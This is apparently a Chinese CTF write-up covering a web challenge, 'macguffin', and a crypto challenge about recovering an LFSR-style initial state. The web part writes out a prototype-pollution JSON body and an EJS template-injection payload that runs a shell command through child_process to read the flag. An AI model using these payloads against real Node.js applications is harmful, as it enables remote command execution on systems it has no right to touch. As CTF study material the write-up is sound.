目录
- Web
-
- macguffin
- Crypto
-
- 夺宝大冒险2
Web
macguffin
- 地址 :http://macguffin.0727.site:5000/
- 提示:在我长大的这个城市里,每个人都有超越寻常的特长。我可以重启这个世界(是的整个世界),不仅仅是将时钟往回拨,而是将世界的一切,从原子层面恢复到一天前的状态。只有看到有人在哭泣时,我才会重启。包括我的记忆,全部重启。但是,不用担心,我的搭档有绝对记忆。然而,我们被困在了这一天里,漫无止境的星期日。有情报说,只要我们重启了这一天,“MacGuffin” 便会出现在我们面前,并且它会满足我们的任何愿望。
进入网址之后用子域名爆破软件扫描一下就会发现有www.zip。下载下来之后查看网站代码
发现无法通过修改http头部信息来进行修改ip。在第五行到第八行可以发现这里可以用原型链污染,如果想进入wish页面需要让crying为true所以在/页面post提交数据的时候需要提交{"__proto__":{"crying":"true"},"name":"a","discription":"aa"}并且将Content-Type改为application/json然后利用set-cookie中的session进入wish页面
在这里用到的是ejs模板注? 通过提交post请求
wishes=<%- global.process.mainModule.constructor._load('child_process').execSync('cat /flag')%>
得到flaghgame{nOdeJs_Prot0type_ls_fUnny&Ejs_Templ@te_Injection}
Crypto
夺宝大冒险2
这个题如果从十进制数来分析的话会比较难做。但是如果是从二进制的数进行分析的话就比较好做了。(这里也有提示)
第二个参数是二进制如果把
这里的lengthmask算出来转成二进制就很好做了(全1)
这里的LXFIQNN函数无非就是将传进去的数进行×2加上1或者0
分析可得加的1或者0是输出出来的数。这里的init分析可得是41位数。
所以可以随便猜11次这样就可以得出44位数将前三位去掉就剩41位数。
这里的41位数就是init将整个代码放到python跑就会跑出来之后的数。
弱鸡表示Week4就做了这俩题,向那些做出来好多题的大佬致敬